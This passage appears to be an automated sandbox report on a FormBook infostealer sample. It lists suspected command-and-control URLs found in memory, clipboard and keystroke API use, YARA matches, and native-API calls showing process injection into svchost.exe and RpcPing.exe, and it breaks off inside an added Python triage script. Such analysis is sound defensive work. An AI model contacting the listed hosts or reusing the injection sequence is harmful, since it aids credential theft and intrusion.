            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 
6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:08 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 
20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3367695283.0000000004D3A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.es-lidl.online
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3367695283.0000000004D3A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.es-lidl.online/n2dv/
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=1
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/px.js?ch=2
            Source: RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/sk-logabpstatus.php?a=bXhMcnlwZUVZbkR2TkpqRG0xWnc5ZTNMZlFTSjFybmRCeWl0
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000005.00000003.1989040837.000000000771B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RpcPing.exe, 00000005.00000002.3361983815.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C4E3 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03273D70 NtOpenThread
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004F9140 NtReadFile
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004F9230 NtDeleteFile
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004F92D0 NtClose
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004F9430 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_004F8FD0 NtCreateFile
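The native-API resolutions listed above for svchost.exe and RpcPing.exe are the raw material behind the report's thread-injection signatures, and what matters for triage is not any single NtXxx call but the combination: open a target, deliver a payload into it (NtWriteVirtualMemory or NtCreateSection/NtMapViewOfSection), then hijack execution (NtQueueApcThread, NtSetContextThread, NtResumeThread). The following Python script is an added triage example, not part of the Joe Sandbox report or of FormBook: it parses a handful of the report's "Code function" rows (re-typed here as constructed sample input, in the fused form the report uses), collects the APIs resolved per process image, and flags the acquire/deliver/hijack combination. The grouping of calls into primitives is the example's own assumption, not a field of the report.

```python
"""Triage helper for the "Code function" rows of a sandbox report.

Added example, not part of the report or of the malware it analyses. It parses rows of
the form "Source: <process>Code function: <pid>_<phase>_<addr> <APIs>,<pid>_<phase>_<addr>",
collects the APIs each process resolves, and flags the process-injection combination:
acquire a target, deliver a payload, hijack execution.
"""
import re
from collections import defaultdict

# Constructed sample input: a few rows re-typed from the report, plus one row with
# no resolved API so the parser's empty path is exercised.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
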